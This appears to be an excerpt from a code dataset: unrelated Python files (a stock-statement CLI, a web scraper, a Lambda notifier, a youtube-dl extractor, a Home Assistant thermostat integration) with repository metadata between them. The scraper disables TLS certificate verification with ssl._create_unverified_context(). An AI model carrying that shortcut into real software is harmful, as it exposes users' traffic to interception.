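# Because the SGD classifier is wrapped in CalibratedClassifierCV, the pickled
# model exposes predict_proba; a dummy 4356-dim HOG vector stands in here for a
# real feature extracted as in extract_feature.
import numpy as np
import pickle

with open('models/Stage1-SGD-2-class.sav', 'rb') as f:
    stage1_model = pickle.load(f)
print(stage1_model.classes_,
      stage1_model.predict_proba(np.zeros((1, 4356))))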
# probability estimation reference: https://mmuratarat.github.io/2019-10-12/probabilistic-output-of-svm#:~:text=SVMs%20don't%20output%20probabilities,the%20output%20to%20class%20probabilities.&text=One%20standard%20way%20to%20obtain,in%20many%20decent%20SVM%20implementations.
# Best estimator found by grid search:
# SGDClassifier(alpha=0.001, max_iter=15000, n_jobs=8, verbose=False)
| 39.712766
| 277
| 0.750871
|
ccbb070dba6e7b395b818e34afb4450f9e967987
| 571
|
py
|
Python
|
beautifulsoup4_test/jsonpath_lagou.py
|
fuandenghuo/100-days-of-python
|
50f3263b0984bb6690e565d58604c1882aaf465e
|
[
"MIT"
] | null | null | null |
beautifulsoup4_test/jsonpath_lagou.py
|
fuandenghuo/100-days-of-python
|
50f3263b0984bb6690e565d58604c1882aaf465e
|
[
"MIT"
] | null | null | null |
beautifulsoup4_test/jsonpath_lagou.py
|
fuandenghuo/100-days-of-python
|
50f3263b0984bb6690e565d58604c1882aaf465e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'abbot'
from urllib import request
import json
import jsonpath
import ssl
url = 'http://www.lagou.com/lbs/getAllCitySearchLabels.json'
context = ssl._create_unverified_context()
req = request.Request(url)
response = request.urlopen(req,context=context)
html = response.read()
print(html)
jsonObj = json.loads(html)
citylist = jsonpath.jsonpath(jsonObj,'$..name')
print(citylist)
print(type(citylist))
fp = open('city.json', 'w', encoding='utf-8')  # explicit UTF-8 so the Chinese city names are preserved
content = json.dumps(citylist, ensure_ascii=False)
print(content)
fp.write(content)
fp.close()
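# --- JSONPath sketch (added illustration; sample payload is hypothetical) ---
# '$..name' is a recursive-descent match: every "name" key at any depth is
# collected, which is why both province and city names end up in citylist.
sample = {"content": {"provinces": [{"name": "Liaoning", "cities": [{"name": "Anshan"}]}]}}
print(jsonpath.jsonpath(sample, '$..name'))  # ['Liaoning', 'Anshan']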
| 16.794118
| 60
| 0.739054
|
c57a71d2bcfde5e1b4a48dc239b082ed9c347d24
| 4,756
|
py
|
Python
|
flexfolio/cli.py
|
grananqvist/flexfolio
|
4c69332cc7511a455dbddb006b7c9b9c8bd0a8ff
|
[
"Apache-2.0"
] | 5
|
2019-09-08T19:30:21.000Z
|
2020-05-07T07:27:13.000Z
|
flexfolio/cli.py
|
grananqvist/flexfolio
|
4c69332cc7511a455dbddb006b7c9b9c8bd0a8ff
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:37:22.000Z
|
2021-06-01T23:37:22.000Z
|
flexfolio/cli.py
|
grananqvist/flexfolio
|
4c69332cc7511a455dbddb006b7c9b9c8bd0a8ff
|
[
"Apache-2.0"
] | 2
|
2020-01-05T17:57:39.000Z
|
2020-05-23T01:28:11.000Z
|
# -*- coding: utf-8 -*-
"""Console script for flexfolio."""
import sys
import logging
import os.path
from typing import Tuple, Optional, cast
from xml.etree import ElementTree
import click
import polling
import requests
from flexfolio.flex_statement import FlexStatement, ALL_MODELS
FLEX_SERVICE_BASE_URL = \
'https://gdcdyn.interactivebrokers.com' \
'/Universal/servlet/FlexStatementService'
FLEX_DL_TIMEOUT = 120
log = logging.getLogger(__name__)
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
@click.group()
def main() -> None:
pass
@main.command()
@click.argument(
'ib-api-token',
nargs=1,
type=click.STRING
)
@click.argument(
'ib-query-id',
nargs=1,
type=click.STRING
)
@click.argument(
'target-file',
nargs=1,
type=click.Path(exists=False, writable=True,
file_okay=True, dir_okay=False)
)
def fetch_statement(ib_api_token: str, ib_query_id: str,
target_file: str) -> None:
# Proxy the call via an interim function so that other
# packages can import this fn and re-use in their cli
return fetch_statement_logic(ib_api_token, ib_query_id, target_file)
def fetch_statement_logic(ib_api_token: str, ib_query_id: str,
target_file: str) -> None:
def _request_statement() -> Tuple[str, str]:
url = "{base}.SendRequest?t={token}&q={query_id}&v=3".format(
base=FLEX_SERVICE_BASE_URL, token=ib_api_token,
query_id=ib_query_id)
response = requests.get(url)
response.raise_for_status()
tree = ElementTree.fromstring(response.content)
status = tree.find('./Status')
if status is None or status.text != 'Success':
log.error("Error requesting flex report: %s", response.content)
raise ValueError("Error requesting flex report")
reference_code = tree.find('./ReferenceCode')
statement_url = tree.find('./Url')
assert reference_code is not None
assert statement_url is not None
return str(reference_code.text), str(statement_url.text)
def _download_statement(reference_code: str, statement_url: str) -> bytes:
url = "{base}?t={token}&q={reference_code}&v=3".format(
base=statement_url, token=ib_api_token,
reference_code=reference_code)
def _download_report() -> Optional[bytes]:
response = requests.get(url)
response.raise_for_status()
tree = ElementTree.fromstring(response.content)
in_progress = tree.find('./Status')
if in_progress is None:
return response.content
return None
content = polling.poll(
_download_report,
timeout=FLEX_DL_TIMEOUT,
step=0.1)
return cast(bytes, content)
log.info("Requesting statement")
reference_code, statement_url = _request_statement()
log.info("Downloading statement")
flex_stmt = _download_statement(reference_code, statement_url)
with open(target_file, 'wb') as f:
f.write(flex_stmt)
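# --- Usage sketch (added illustration; placeholder token and query id) ---
# The click command above simply forwards to fetch_statement_logic, so the same
# download can be driven programmatically, e.g. from a scheduler:
def example_fetch():
    fetch_statement_logic(ib_api_token='REPLACE_WITH_TOKEN',
                          ib_query_id='123456',
                          target_file='statement.xml')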
@main.command()
@click.argument(
'flex-statement-path',
nargs=1,
type=click.Path(exists=True)
)
@click.argument(
'target-dir',
nargs=1,
type=click.Path(exists=True, writable=True,
file_okay=False, dir_okay=True)
)
@click.option(
'--output-format',
default='json',
type=click.Choice(['json', 'hdf5', 'pickle', 'msgpack'])
)
@click.option(
'--model',
default=ALL_MODELS
)
def statement_to_pyfolio(flex_statement_path: str,
target_dir: str,
output_format: str,
model: str) -> int:
report = FlexStatement(flex_statement_path)
for fn_name in ('returns', 'positions', 'transactions'):
fn = getattr(report, fn_name)
df = fn(model)
file_suffix = \
os.path.basename(flex_statement_path).replace('.xml', '')
target_file = \
'{dir}/{file_base}-{fn}.{format}'.format(
dir=target_dir,
file_base=file_suffix,
fn=fn_name,
format=output_format)
log.info("Storing %s to %s", fn_name, target_file)
if output_format == 'json':
df.to_json(target_file, orient='table')
elif output_format == 'hdf5':
df.to_hdf(target_file, key=fn_name)
elif output_format == 'pickle':
df.to_pickle(target_file)
elif output_format == 'msgpack':
df.to_msgpack(target_file)
return 0
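# --- Test-style sketch (added illustration) ---
# click commands can be exercised in-process with CliRunner; this assumes a
# statement.xml produced by fetch-statement sits in the working directory.
def example_convert():
    from click.testing import CliRunner
    runner = CliRunner()
    result = runner.invoke(statement_to_pyfolio,
                           ['statement.xml', '.', '--output-format', 'json'])
    print(result.exit_code, result.output)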
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| 28.479042
| 78
| 0.622792
|
16efc76c4197bde7bfdeb31f4500145cd6c0064d
| 136
|
py
|
Python
|
testapp/models.py
|
ppiyakk2/django-markdownx
|
bb2dfe2528fcedca880a8a78c96ec57c10f8290b
|
[
"BSD-2-Clause-FreeBSD"
] | 628
|
2017-04-23T19:09:49.000Z
|
2022-03-30T19:59:44.000Z
|
testapp/models.py
|
ppiyakk2/django-markdownx
|
bb2dfe2528fcedca880a8a78c96ec57c10f8290b
|
[
"BSD-2-Clause-FreeBSD"
] | 142
|
2017-04-23T20:23:08.000Z
|
2022-03-09T15:42:16.000Z
|
testapp/models.py
|
ppiyakk2/django-markdownx
|
bb2dfe2528fcedca880a8a78c96ec57c10f8290b
|
[
"BSD-2-Clause-FreeBSD"
] | 142
|
2017-04-24T13:55:26.000Z
|
2022-03-11T14:45:57.000Z
|
from django.db import models
from markdownx.models import MarkdownxField
class MyModel(models.Model):
myfield = MarkdownxField()
| 17
| 43
| 0.786765
|
87ba318146d8c0099addf7608c68cccccae5ec0d
| 474
|
py
|
Python
|
lambda/notifier/main.py
|
igorgorbenko/aviasales_kinesis
|
46c099e0f8a96e85244954a6dca1aab81405b91f
|
[
"MIT"
] | 1
|
2020-05-12T08:34:57.000Z
|
2020-05-12T08:34:57.000Z
|
lambda/notifier/main.py
|
igorgorbenko/aviasales_kinesis
|
46c099e0f8a96e85244954a6dca1aab81405b91f
|
[
"MIT"
] | null | null | null |
lambda/notifier/main.py
|
igorgorbenko/aviasales_kinesis
|
46c099e0f8a96e85244954a6dca1aab81405b91f
|
[
"MIT"
] | null | null | null |
import boto3
import base64
import os
SNS_CLIENT = boto3.client('sns')
TOPIC_ARN = os.environ['TOPIC_ARN']
def lambda_handler(event, context):
try:
SNS_CLIENT.publish(TopicArn=TOPIC_ARN,
Message='Hi! I have found an interesting stuff!',
Subject='Airline tickets alarm')
print('Alarm message has been successfully delivered')
except Exception as err:
print('Delivery failure', str(err))
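# --- Local-invocation sketch (added illustration) ---
# Running the handler outside Lambda needs AWS credentials and a TOPIC_ARN
# environment variable pointing at a real SNS topic; the event payload is
# ignored by the handler above.
if __name__ == '__main__':
    lambda_handler(event={'source': 'local-test'}, context=None)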
| 27.882353
| 76
| 0.637131
|
80bfa6410fc376c9d06370bdef4e1b0da179a305
| 4,015
|
py
|
Python
|
server/external/youtube-dl/youtube_dl/extractor/abcotvs.py
|
yycc179/urlp
|
d272b74c4aed18f03ccada8817ecf5c572a1bf71
|
[
"MIT"
] | null | null | null |
server/external/youtube-dl/youtube_dl/extractor/abcotvs.py
|
yycc179/urlp
|
d272b74c4aed18f03ccada8817ecf5c572a1bf71
|
[
"MIT"
] | null | null | null |
server/external/youtube-dl/youtube_dl/extractor/abcotvs.py
|
yycc179/urlp
|
d272b74c4aed18f03ccada8817ecf5c572a1bf71
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
int_or_none,
parse_iso8601,
)
class ABCOTVSIE(InfoExtractor):
IE_NAME = 'abcotvs'
IE_DESC = 'ABC Owned Television Stations'
_VALID_URL = r'https?://(?:abc(?:7(?:news|ny|chicago)?|11|13|30)|6abc)\.com(?:/[^/]+/(?P<display_id>[^/]+))?/(?P<id>\d+)'
_TESTS = [
{
'url': 'http://abc7news.com/entertainment/east-bay-museum-celebrates-vintage-synthesizers/472581/',
'info_dict': {
'id': '472581',
'display_id': 'east-bay-museum-celebrates-vintage-synthesizers',
'ext': 'mp4',
'title': 'East Bay museum celebrates vintage synthesizers',
'description': 'md5:24ed2bd527096ec2a5c67b9d5a9005f3',
'thumbnail': r're:^https?://.*\.jpg$',
'timestamp': 1421123075,
'upload_date': '20150113',
'uploader': 'Jonathan Bloom',
},
'params': {
# m3u8 download
'skip_download': True,
},
},
{
'url': 'http://abc7news.com/472581',
'only_matching': True,
},
]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
display_id = mobj.group('display_id') or video_id
webpage = self._download_webpage(url, display_id)
m3u8 = self._html_search_meta(
'contentURL', webpage, 'm3u8 url', fatal=True).split('?')[0]
formats = self._extract_m3u8_formats(m3u8, display_id, 'mp4')
self._sort_formats(formats)
title = self._og_search_title(webpage).strip()
description = self._og_search_description(webpage).strip()
thumbnail = self._og_search_thumbnail(webpage)
timestamp = parse_iso8601(self._search_regex(
r'<div class="meta">\s*<time class="timeago" datetime="([^"]+)">',
webpage, 'upload date', fatal=False))
uploader = self._search_regex(
r'rel="author">([^<]+)</a>',
webpage, 'uploader', default=None)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'timestamp': timestamp,
'uploader': uploader,
'formats': formats,
}
class ABCOTVSClipsIE(InfoExtractor):
IE_NAME = 'abcotvs:clips'
_VALID_URL = r'https?://clips\.abcotvs\.com/(?:[^/]+/)*video/(?P<id>\d+)'
_TEST = {
'url': 'https://clips.abcotvs.com/kabc/video/214814',
'info_dict': {
'id': '214814',
'ext': 'mp4',
'title': 'SpaceX launch pad explosion destroys rocket, satellite',
'description': 'md5:9f186e5ad8f490f65409965ee9c7be1b',
'upload_date': '20160901',
'timestamp': 1472756695,
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
video_data = self._download_json('https://clips.abcotvs.com/vogo/video/getByIds?ids=' + video_id, video_id)['results'][0]
title = video_data['title']
formats = self._extract_m3u8_formats(
video_data['videoURL'].split('?')[0], video_id, 'mp4')
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': video_data.get('description'),
'thumbnail': video_data.get('thumbnailURL'),
'duration': int_or_none(video_data.get('duration')),
'timestamp': int_or_none(video_data.get('pubDate')),
'formats': formats,
}
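# --- Usage sketch (added illustration) ---
# Exercising the extractor through youtube-dl's public API; the URL comes from
# the _TESTS block above and download=False keeps this metadata-only.
def example_extract():
    import youtube_dl
    with youtube_dl.YoutubeDL({'quiet': True}) as ydl:
        info = ydl.extract_info('http://abc7news.com/472581', download=False)
        print(info.get('title'))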
| 35.530973
| 130
| 0.534247
|
0c7f6095ec7e830cc7fb0a0eaadedcc556ce15c2
| 27,149
|
py
|
Python
|
custom_components/lennoxs30/__init__.py
|
HyperActiveJ/lennoxs30
|
28efd9a447ec82dd84d61d9c631e183a4168cdce
|
[
"MIT"
] | null | null | null |
custom_components/lennoxs30/__init__.py
|
HyperActiveJ/lennoxs30
|
28efd9a447ec82dd84d61d9c631e183a4168cdce
|
[
"MIT"
] | null | null | null |
custom_components/lennoxs30/__init__.py
|
HyperActiveJ/lennoxs30
|
28efd9a447ec82dd84d61d9c631e183a4168cdce
|
[
"MIT"
] | null | null | null |
"""Support for Lennoxs30 cloud api"""
import asyncio
from asyncio.locks import Event, Lock
import logging
from lennoxs30api.s30exception import EC_COMMS_ERROR, EC_CONFIG_TIMEOUT
from lennoxs30api import (
EC_HTTP_ERR,
EC_LOGIN,
EC_SUBSCRIBE,
EC_UNAUTHORIZED,
S30Exception,
s30api_async,
)
import voluptuous as vol
from .const import (
CONF_ALLERGEN_DEFENDER_SWITCH,
CONF_APP_ID,
CONF_CREATE_INVERTER_POWER,
CONF_CREATE_SENSORS,
CONF_FAST_POLL_INTERVAL,
CONF_FAST_POLL_COUNT,
CONF_INIT_WAIT_TIME,
CONF_LOG_MESSAGES_TO_FILE,
CONF_MESSAGE_DEBUG_FILE,
CONF_MESSAGE_DEBUG_LOGGING,
CONF_PII_IN_MESSAGE_LOGS,
DEFAULT_CLOUD_TIMEOUT,
DEFAULT_LOCAL_TIMEOUT,
LENNOX_DEFAULT_CLOUD_APP_ID,
LENNOX_DEFAULT_LOCAL_APP_ID,
LENNOX_DOMAIN,
CONF_CLOUD_CONNECTION,
MANAGER,
)
from .device import (
S30ControllerDevice,
S30IndoorUnit,
S30OutdoorUnit,
S30ZoneThermostat,
)
from .util import dict_redact_fields, redact_email
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry
from typing import Any
DOMAIN = LENNOX_DOMAIN
DOMAIN_STATE = "lennoxs30.state"
PLATFORMS = ["sensor", "climate", "switch", "number", "binary_sensor"]
DS_CONNECTING = "Connecting"
DS_DISCONNECTED = "Disconnected"
DS_LOGIN_FAILED = "Login Failed"
DS_CONNECTED = "Connected"
DS_RETRY_WAIT = "Waiting to Retry"
DS_FAILED = "Failed"
from homeassistant.const import (
CONF_HOST,
CONF_EMAIL,
CONF_HOSTS,
CONF_PASSWORD,
CONF_PROTOCOL,
CONF_SCAN_INTERVAL,
EVENT_HOMEASSISTANT_STOP,
CONF_TIMEOUT,
)
DEFAULT_POLL_INTERVAL: int = 10
DEFAULT_LOCAL_POLL_INTERVAL: int = 1
DEFAULT_FAST_POLL_INTERVAL: float = 0.75
MAX_ERRORS = 2
RETRY_INTERVAL_SECONDS = 60
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_EMAIL): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_HOSTS, default="Cloud"): str,
vol.Optional(CONF_SCAN_INTERVAL): cv.positive_int,
vol.Optional(
CONF_FAST_POLL_INTERVAL, default=DEFAULT_FAST_POLL_INTERVAL
): cv.positive_float,
vol.Optional(CONF_ALLERGEN_DEFENDER_SWITCH, default=False): cv.boolean,
vol.Optional(CONF_APP_ID): cv.string,
vol.Optional(CONF_INIT_WAIT_TIME, default=30): cv.positive_int,
vol.Optional(CONF_CREATE_SENSORS, default=False): cv.boolean,
vol.Optional(CONF_CREATE_INVERTER_POWER, default=False): cv.boolean,
vol.Optional(CONF_PROTOCOL, default="https"): cv.string,
vol.Optional(CONF_PII_IN_MESSAGE_LOGS, default=False): cv.boolean,
vol.Optional(CONF_MESSAGE_DEBUG_LOGGING, default=True): cv.boolean,
vol.Optional(CONF_MESSAGE_DEBUG_FILE, default=""): cv.string,
}
)
},
extra=vol.ALLOW_EXTRA,
)
_LOGGER = logging.getLogger(__name__)
async def async_setup(hass: HomeAssistant, config: ConfigType):
"""Import config as config entry."""
hass.data[DOMAIN] = {}
if config.get(DOMAIN) is None:
return True
_LOGGER.warning(
"Configuration of the LennoxS30 platform in YAML is deprecated "
"and will be removed; your existing configuration "
"has been imported into the UI automatically and can be safely removed "
"from your configuration.yaml file"
)
conf_hosts: str = config.get(DOMAIN).get(CONF_HOSTS)
host_list = []
if conf_hosts == "Cloud":
conf_hosts = None
host_list.append(None)
else:
host_list = conf_hosts.split(",")
for host_name in host_list:
cloud_connection: bool = False
if host_name == None:
cloud_connection = True
log_to_file = True
if config.get(DOMAIN).get(CONF_MESSAGE_DEBUG_FILE) == "":
log_to_file = False
conf_scan_interval = config.get(DOMAIN).get(CONF_SCAN_INTERVAL)
if conf_scan_interval is None:
if cloud_connection == True:
conf_scan_interval = DEFAULT_POLL_INTERVAL
else:
conf_scan_interval = DEFAULT_LOCAL_POLL_INTERVAL
migration_data = {
CONF_SCAN_INTERVAL: conf_scan_interval,
CONF_FAST_POLL_INTERVAL: config.get(DOMAIN).get(CONF_FAST_POLL_INTERVAL),
CONF_ALLERGEN_DEFENDER_SWITCH: config.get(DOMAIN).get(
CONF_ALLERGEN_DEFENDER_SWITCH
),
CONF_APP_ID: config.get(DOMAIN).get(CONF_APP_ID),
CONF_INIT_WAIT_TIME: config.get(DOMAIN).get(CONF_INIT_WAIT_TIME),
CONF_CREATE_SENSORS: config.get(DOMAIN).get(CONF_CREATE_SENSORS),
CONF_PROTOCOL: config.get(DOMAIN).get(CONF_PROTOCOL),
CONF_PII_IN_MESSAGE_LOGS: config.get(DOMAIN).get(CONF_PII_IN_MESSAGE_LOGS),
CONF_MESSAGE_DEBUG_LOGGING: config.get(DOMAIN).get(
CONF_MESSAGE_DEBUG_LOGGING
),
CONF_MESSAGE_DEBUG_FILE: config.get(DOMAIN).get(CONF_MESSAGE_DEBUG_FILE),
CONF_LOG_MESSAGES_TO_FILE: log_to_file,
CONF_CLOUD_CONNECTION: cloud_connection,
}
if cloud_connection == True:
migration_data[CONF_EMAIL] = config.get(DOMAIN).get(CONF_EMAIL)
migration_data[CONF_PASSWORD] = config.get(DOMAIN).get(CONF_PASSWORD)
if migration_data[CONF_APP_ID] == None:
migration_data[CONF_APP_ID] = LENNOX_DEFAULT_CLOUD_APP_ID
else:
migration_data[CONF_HOST] = host_name
if migration_data[CONF_APP_ID] == None:
migration_data[CONF_APP_ID] = LENNOX_DEFAULT_LOCAL_APP_ID
migration_data[CONF_CREATE_INVERTER_POWER] = config.get(DOMAIN).get(
CONF_CREATE_INVERTER_POWER
)
create_migration_task(hass, migration_data)
return True
def create_migration_task(hass, migration_data):
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=migration_data,
)
)
async def async_migrate_entry(hass, config_entry: ConfigEntry):
if config_entry.version == 1:
old_version = config_entry.version
_LOGGER.debug(
f"Upgrading configuration for [{config_entry.title}] from version [{config_entry.version}]"
)
new = {**config_entry.data}
new[CONF_FAST_POLL_COUNT] = 10
new[CONF_TIMEOUT] = (
DEFAULT_CLOUD_TIMEOUT
if new[CONF_CLOUD_CONNECTION] == True
else DEFAULT_LOCAL_TIMEOUT
)
config_entry.version = 2
hass.config_entries.async_update_entry(config_entry, data=new)
_LOGGER.info(
f"Configuration for [{config_entry.title}] upgraded from version [{old_version}] to version [{config_entry.version}]"
)
return True
# Track the title of the first entry, it gets the S30.State object
_first_entry_title: str = None
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
_LOGGER.debug(
f"async_setup_entry UniqueID [{entry.unique_id}] Data [{dict_redact_fields(entry.data)}]"
)
# Determine if this is the first entry that gets S30.State.
global _first_entry_title
index: int = 1
if _first_entry_title == None:
_first_entry_title = entry.title
if _first_entry_title == entry.title:
index = 0
is_cloud = entry.data[CONF_CLOUD_CONNECTION]
if is_cloud == True:
host_name: str = None
email = entry.data[CONF_EMAIL]
password = entry.data[CONF_PASSWORD]
create_inverter_power: bool = False
conf_protocol: str = None
else:
host_name = entry.data[CONF_HOST]
email: str = None
password: str = None
create_inverter_power: bool = entry.data[CONF_CREATE_INVERTER_POWER]
conf_protocol: str = entry.data[CONF_PROTOCOL]
if CONF_APP_ID in entry.data:
app_id: str = entry.data[CONF_APP_ID]
else:
app_id: str = None
poll_interval = entry.data[CONF_SCAN_INTERVAL]
fast_poll_interval = entry.data[CONF_FAST_POLL_INTERVAL]
fast_poll_count = entry.data[CONF_FAST_POLL_COUNT]
timeout = entry.data[CONF_TIMEOUT]
allergenDefenderSwitch = entry.data[CONF_ALLERGEN_DEFENDER_SWITCH]
conf_init_wait_time = entry.data[CONF_INIT_WAIT_TIME]
create_sensors = entry.data[CONF_CREATE_SENSORS]
conf_pii_in_message_logs = entry.data[CONF_PII_IN_MESSAGE_LOGS]
conf_message_debug_logging = entry.data[CONF_MESSAGE_DEBUG_LOGGING]
conf_message_debug_file = entry.data[CONF_MESSAGE_DEBUG_FILE]
# If no path specified then it goes into the config directory,
if conf_message_debug_file == "":
conf_message_debug_file = None
_LOGGER.debug(
f"async_setup starting scan_interval [{poll_interval}] fast_scan_interval[{fast_poll_interval}] app_id [{app_id}] config_init_wait_time [{conf_init_wait_time}] create_sensors [{create_sensors}] create_inverter_power [{create_inverter_power}] timeout [{timeout}]"
)
manager = Manager(
hass=hass,
config=entry,
email=email,
password=password,
poll_interval=poll_interval,
fast_poll_interval=fast_poll_interval,
fast_poll_count=fast_poll_count,
timeout=timeout,
allergenDefenderSwitch=allergenDefenderSwitch,
app_id=app_id,
conf_init_wait_time=conf_init_wait_time,
ip_address=host_name,
create_sensors=create_sensors,
create_inverter_power=create_inverter_power,
protocol=conf_protocol,
index=index,
pii_message_logs=conf_pii_in_message_logs,
message_debug_logging=conf_message_debug_logging,
message_logging_file=conf_message_debug_file,
)
try:
listener = hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_STOP, manager.async_shutdown
)
await manager.s30_initialize()
except S30Exception as e:
if e.error_code == EC_LOGIN:
# TODO: encapsulate in manager class
manager.updateState(DS_LOGIN_FAILED)
raise HomeAssistantError(
f"Lennox30 unable to login host [{host_name}] - please check credentials and restart Home Assistant"
)
elif e.error_code == EC_CONFIG_TIMEOUT:
_LOGGER.warning("async_setup: " + e.message)
_LOGGER.info("connection will be retried in 1 minute")
asyncio.create_task(manager.initialize_retry_task())
else:
_LOGGER.error("async_setup unexpected error " + e.message)
_LOGGER.info("connection will be retried in 1 minute")
asyncio.create_task(manager.initialize_retry_task())
_LOGGER.debug(f"async_setup complete host [{host_name}]")
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
_LOGGER.debug(f"async_unload_entry entry [{entry.unique_id}]")
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok == True:
entry_data = hass.data[DOMAIN].pop(entry.unique_id)
manager: Manager = entry_data[MANAGER]
try:
await manager.async_shutdown(None)
except S30Exception as e:
_LOGGER.error(
f"async_unload_entry entry [{entry.unique_id}] error [{e.as_string()}]"
)
except Exception as e:
_LOGGER.exception(f"async_unload_entry entry [{entry.unique_id}]")
return True
else:
_LOGGER.error(
f"async_unload_entry call to hass.config_entries.async_unload_platforms returned False"
)
return False
class Manager(object):
def __init__(
self,
hass: HomeAssistant,
config: ConfigEntry,
email: str,
password: str,
poll_interval: int,
fast_poll_interval: float,
fast_poll_count: int,
timeout: int,
allergenDefenderSwitch: bool,
app_id: str,
conf_init_wait_time: int,
ip_address: str,
create_sensors: bool,
create_inverter_power: bool,
protocol: str,
index: int = 0,
pii_message_logs: bool = False,
message_debug_logging: bool = True,
message_logging_file: str = None,
):
self._config_entry: ConfigEntry = config
self._reinitialize: bool = False
self._err_cnt: int = 0
self._mp_wakeup_event: Event = Event()
self._climate_entities_initialized: bool = False
self._hass: HomeAssistant = hass
self._config: ConfigEntry = config
self._poll_interval: int = poll_interval
self._fast_poll_interval: float = fast_poll_interval
self._fast_poll_count: int = fast_poll_count
self._protocol = protocol
self._ip_address = ip_address
self._pii_message_log = pii_message_logs
self._message_debug_logging = message_debug_logging
self._message_logging_file = message_logging_file
self._api: s30api_async = s30api_async(
email,
password,
app_id,
ip_address=ip_address,
protocol=self._protocol,
pii_message_logs=self._pii_message_log,
message_debug_logging=self._message_debug_logging,
message_logging_file=self._message_logging_file,
timeout=timeout,
)
self._shutdown = False
self._retrieve_task = None
self._allergenDefenderSwitch = allergenDefenderSwitch
self._createSensors: bool = create_sensors
self._create_inverter_power: bool = create_inverter_power
self._conf_init_wait_time = conf_init_wait_time
self._is_metric: bool = hass.config.units.is_metric
if index == 0:
self.connection_state = DOMAIN_STATE
else:
if ip_address == None:
e_name = email.split("@")
redacted_email: str = e_name[0].replace(".", "_")
self.connection_state = "lennoxs30.conn_" + redacted_email
else:
self.connection_state = "lennoxs30.conn_" + self._ip_address.replace(
".", "_"
).replace(":", "_")
async def async_shutdown(self, event: Event) -> None:
_LOGGER.debug(f"async_shutdown started host [{self._ip_address}]")
self._shutdown = True
if self._retrieve_task != None:
self._mp_wakeup_event.set()
await self._retrieve_task
await self._api.shutdown()
_LOGGER.debug(f"async_shutdown complete [{self._ip_address}]")
def updateState(self, state: int) -> None:
self._hass.states.async_set(
self.connection_state, state, self.getMetricsList(), force_update=True
)
def getMetricsList(self):
metrics = self._api.metrics.getMetricList()
# TODO these are at the individual S30 level, when we have a device object we should move this there
systems = self._api.getSystems()
if len(systems) > 0:
system: s30api_async.lennox_system = systems[0]
if system is not None:
metrics["sysUpTime"] = system.sysUpTime
metrics["diagLevel"] = system.diagLevel
metrics["softwareVersion"] = system.softwareVersion
metrics["hostname"] = self._ip_address
return metrics
async def s30_initialize(self):
self.updateState(DS_CONNECTING)
await self.connect_subscribe()
await self.configuration_initialization()
# Launch the message pump loop
self._retrieve_task = asyncio.create_task(self.messagePump_task())
# Since there is no change detection implemented to update device attributes like SW version - always reinitialize
await self.create_devices()
# Only add entities the first time, on reconnect we do not need to add them again
if self._climate_entities_initialized == False:
self._hass.data[DOMAIN][self._config.unique_id] = {MANAGER: self}
for platform in PLATFORMS:
self._hass.async_create_task(
self._hass.config_entries.async_forward_entry_setup(
self._config, platform
)
)
self._climate_entities_initialized = True
self.updateState(DS_CONNECTED)
async def create_devices(self):
for system in self._api._systemList:
s30: S30ControllerDevice = S30ControllerDevice(
self._hass, self._config_entry, system
)
s30.register_device()
if system.has_outdoor_unit:
s30_outdoor_unit = S30OutdoorUnit(
self._hass, self._config_entry, system, s30
)
s30_outdoor_unit.register_device()
if system.has_indoor_unit:
s30_indoor_unit = S30IndoorUnit(
self._hass, self._config_entry, system, s30
)
s30_indoor_unit.register_device()
for zone in system._zoneList:
if zone.is_zone_active() == True:
z: S30ZoneThermostat = S30ZoneThermostat(
self._hass, self._config_entry, system, zone, s30
)
z.register_device()
async def initialize_retry_task(self):
while True:
self.updateState(DS_RETRY_WAIT)
await asyncio.sleep(RETRY_INTERVAL_SECONDS)
self.updateState(DS_CONNECTING)
try:
await self.s30_initialize()
self.updateState(DS_CONNECTED)
return
except S30Exception as e:
if e.error_code == EC_LOGIN:
# TODO: encapsulate in manager class
self.updateState(DS_LOGIN_FAILED)
_LOGGER.error(
f"initialize_retry_task host [{self._ip_address}] {e.as_string()}"
)
return
elif e.error_code == EC_CONFIG_TIMEOUT:
_LOGGER.warning(
f"async_setup: host [{self._ip_address}] {e.as_string()}"
)
_LOGGER.info(
f"connection host [{self._ip_address}] will be retried in 1 minute"
)
else:
_LOGGER.error(
f"async_setup host [{self._ip_address}] unexpected error {e.as_string()}"
)
_LOGGER.info(
f"async setup host [{self._ip_address}] will be retried in 1 minute"
)
async def configuration_initialization(self) -> None:
# Wait for zones to appear on each system
systemsWithZones = 0
loops: int = 0
numOfSystems = len(self._api.getSystems())
# To speed startup, we only want to sleep when a message was not received.
got_message: bool = True
while systemsWithZones < numOfSystems and loops < self._conf_init_wait_time:
_LOGGER.debug(
f"__init__:async_setup waiting for zone config to arrive host [{self._ip_address}] numSystems ["
+ str(numOfSystems)
+ "] systemsWithZones ["
+ str(systemsWithZones)
+ "]"
)
# Only take a breather if we did not get a message.
if got_message == False:
await asyncio.sleep(1.0)
systemsWithZones = 0
got_message = await self.messagePump()
for lsystem in self._api.getSystems():
# Issue #33 - system configuration isn't complete until we've received the name from Lennox.
